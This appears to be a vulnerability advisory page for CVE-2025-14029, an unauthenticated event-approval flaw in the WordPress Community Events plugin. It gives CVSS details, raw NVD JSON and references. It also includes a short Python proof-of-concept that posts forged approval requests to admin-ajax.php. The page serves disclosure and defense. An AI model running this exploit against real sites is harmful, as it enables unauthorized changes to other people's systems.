Security Vulnerability Report
中文
CVE-2025-14029 CVSS 5.3 MEDIUM

CVE-2025-14029

Published: 2026-01-17 05:16:10
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

The Community Events plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the ajax_admin_event_approval() function in all versions up to, and including, 1.5.6. This makes it possible for unauthenticated attackers to approve arbitrary events via the 'eventlist' parameter.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

WordPress Community Events插件 <= 1.5.6

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # CVE-2025-14029 PoC - WordPress Community Events Unauthenticated Event Approval target_url = "http://target-wordpress-site.com/wp-admin/admin-ajax.php" # Payload to approve arbitrary events without authentication payload = { "action": "admin_event_approval", "eventlist": "1,2,3,999" # Specify event IDs to approve } # Send the exploit request response = requests.post(target_url, data=payload) print(f"Status Code: {response.status_code}") print(f"Response: {response.text}") # Check if the request was successful if response.status_code == 200: print("[+] Exploit sent successfully - events may have been approved")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-14029", "sourceIdentifier": "[email protected]", "published": "2026-01-17T05:16:10.370", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Community Events plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the ajax_admin_event_approval() function in all versions up to, and including, 1.5.6. This makes it possible for unauthenticated attackers to approve arbitrary events via the 'eventlist' parameter."}, {"lang": "es", "value": "El plugin Community Events para WordPress es vulnerable a la modificación no autorizada de datos debido a una comprobación de capacidad faltante en la función ajax_admin_event_approval() en todas las versiones hasta la 1.5.6, inclusive. Esto hace posible que atacantes no autenticados aprueben eventos arbitrarios a través del parámetro 'eventlist'."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/community-events/tags/1.5.5/community-events.php#L160", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/community-events/tags/1.5.5/community-events.php#L64", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/community-events/trunk/community-events.php#L160", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3437116%40community-events&new=3437116%40community-events&sfp_email=&sfph_mail=", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/098c3f4c-b6bc-462a-98ef-30e6a68d74cf?source=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.